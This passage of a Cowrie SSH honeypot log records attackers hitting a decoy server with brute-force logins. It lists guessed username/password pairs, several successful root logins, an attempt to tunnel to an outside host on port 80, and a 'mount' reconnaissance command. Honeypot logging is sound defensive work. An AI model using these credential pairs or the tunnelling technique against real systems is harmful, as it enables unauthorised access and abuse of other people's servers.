","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:22:53.697617Z","src_ip":"102.210.148.92","session":"5a1c230da113"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:22:54.119606Z","src_ip":"212.227.235.229","session":"1302197ab9ea"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"1234.com","message":"login attempt [infocare/1234.com] failed","sensor":"my-vps","timestamp":"2025-08-31T07:22:54.383051Z","src_ip":"102.210.148.92","session":"5a1c230da113"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:22:55.546412Z","src_ip":"102.210.148.92","session":"5a1c230da113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51904,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff89358488b","protocol":"ssh","message":"New connection: 212.227.125.160:51904 (1.2.3.4:22) [session: aff89358488b]","sensor":"my-vps","timestamp":"2025-08-31T07:23:06.921450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:23:07.274889Z","src_ip":"212.227.125.160","session":"aff89358488b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:23:07.275884Z","src_ip":"212.227.125.160","session":"aff89358488b"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"welcome","message":"login attempt [zabbix/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T07:23:08.655090Z","src_ip":"212.227.125.160","session":"aff89358488b"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:23:10.090607Z","src_ip":"212.227.125.160","session":"aff89358488b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40092,"dst_ip":"1.2.3.4","dst_port":22,"session":"efff949dd6df","protocol":"ssh","message":"New connection: 212.227.235.229:40092 (1.2.3.4:22) [session: efff949dd6df]","sensor":"my-vps","timestamp":"2025-08-31T07:23:45.179820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:23:45.978247Z","src_ip":"212.227.235.229","session":"efff949dd6df"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:23:45.978948Z","src_ip":"212.227.235.229","session":"efff949dd6df"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"abc123","message":"login attempt [zabbix/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:23:51.659526Z","src_ip":"212.227.235.229","session":"efff949dd6df"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:23:53.476899Z","src_ip":"212.227.235.229","session":"efff949dd6df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58378,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ba1d1728bec","protocol":"ssh","message":"New connection: 212.227.125.160:58378 (1.2.3.4:22) [session: 5ba1d1728bec]","sensor":"my-vps","timestamp":"2025-08-31T07:24:06.867737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:24:07.297271Z","src_ip":"212.227.125.160","session":"5ba1d1728bec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:24:07.298281Z","src_ip":"212.227.125.160","session":"5ba1d1728bec"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":49650,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a3f0b1b401f","protocol":"ssh","message":"New connection: 80.94.95.15:49650 (1.2.3.4:22) [session: 7a3f0b1b401f]","sensor":"my-vps","timestamp":"2025-08-31T07:24:08.306508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:24:08.307198Z","src_ip":"80.94.95.15","session":"7a3f0b1b401f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:24:08.358700Z","src_ip":"80.94.95.15","session":"7a3f0b1b401f"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:24:08.645329Z","src_ip":"80.94.95.15","session":"7a3f0b1b401f"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":45296,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c10de3d20e6","protocol":"ssh","message":"New connection: 102.210.148.92:45296 (1.2.3.4:22) [session: 2c10de3d20e6]","sensor":"my-vps","timestamp":"2025-08-31T07:24:09.495624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:24:09.496403Z","src_ip":"102.210.148.92","session":"2c10de3d20e6"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"abc123","message":"login attempt [zabbix/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:24:09.501769Z","src_ip":"212.227.125.160","session":"5ba1d1728bec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:24:09.673378Z","src_ip":"102.210.148.92","session":"2c10de3d20e6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:24:09.698616Z","src_ip":"80.94.95.15","session":"7a3f0b1b401f"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456@abc","message":"login attempt [app/123456@abc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:24:10.422064Z","src_ip":"102.210.148.92","session":"2c10de3d20e6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:24:11.100095Z","src_ip":"212.227.125.160","session":"5ba1d1728bec"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:24:11.601309Z","src_ip":"102.210.148.92","session":"2c10de3d20e6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56828,"dst_ip":"1.2.3.4","dst_port":22,"session":"f79444402f76","protocol":"ssh","message":"New connection: 217.72.205.35:56828 (1.2.3.4:22) [session: f79444402f76]","sensor":"my-vps","timestamp":"2025-08-31T07:24:20.285883Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:24:20.287089Z","src_ip":"217.72.205.35","session":"f79444402f76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43143,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9aa144d89f1","protocol":"ssh","message":"New connection: 212.227.125.160:43143 (1.2.3.4:22) [session: b9aa144d89f1]","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.074556Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.075809Z","src_ip":"212.227.125.160","session":"b9aa144d89f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43407,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec181e017274","protocol":"ssh","message":"New connection: 212.227.125.160:43407 (1.2.3.4:22) [session: ec181e017274]","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.184763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.185869Z","src_ip":"212.227.125.160","session":"ec181e017274"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.298289Z","src_ip":"212.227.125.160","session":"ec181e017274"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.637006Z","src_ip":"212.227.125.160","session":"ec181e017274"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T07:24:42.750726Z","session":"ec181e017274"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":44314,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d921ec0e3b4","protocol":"ssh","message":"New connection: 102.210.148.92:44314 (1.2.3.4:22) [session: 1d921ec0e3b4]","sensor":"my-vps","timestamp":"2025-08-31T07:25:21.876031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:25:21.877199Z","src_ip":"102.210.148.92","session":"1d921ec0e3b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:25:22.036468Z","src_ip":"102.210.148.92","session":"1d921ec0e3b4"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"1234@abc","message":"login attempt [ansible/1234@abc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:25:22.714314Z","src_ip":"102.210.148.92","session":"1d921ec0e3b4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:25:23.876381Z","src_ip":"102.210.148.92","session":"1d921ec0e3b4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:25:52.186721Z","src_ip":"212.227.125.160","session":"ec181e017274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43362,"dst_ip":"1.2.3.4","dst_port":22,"session":"81611f5dea96","protocol":"ssh","message":"New connection: 212.227.125.160:43362 (1.2.3.4:22) [session: 81611f5dea96]","sensor":"my-vps","timestamp":"2025-08-31T07:25:54.414923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:25:55.188369Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:25:55.189050Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.login.success","username":"root","password":"Control@2018!!##","message":"login attempt [root/Control@2018!!##] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:26:00.638164Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:26:04.006788Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T07:26:04.007659Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:05.061726Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:05.062905Z","src_ip":"212.227.125.160","session":"81611f5dea96"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":53058,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a99cbc7a91e","protocol":"ssh","message":"New connection: 201.148.180.50:53058 (1.2.3.4:22) [session: 4a99cbc7a91e]","sensor":"my-vps","timestamp":"2025-08-31T07:26:13.198823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:26:14.000828Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:26:14.001479Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.login.success","username":"root","password":"Control@2018!!##","message":"login attempt [root/Control@2018!!##] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:26:19.676740Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
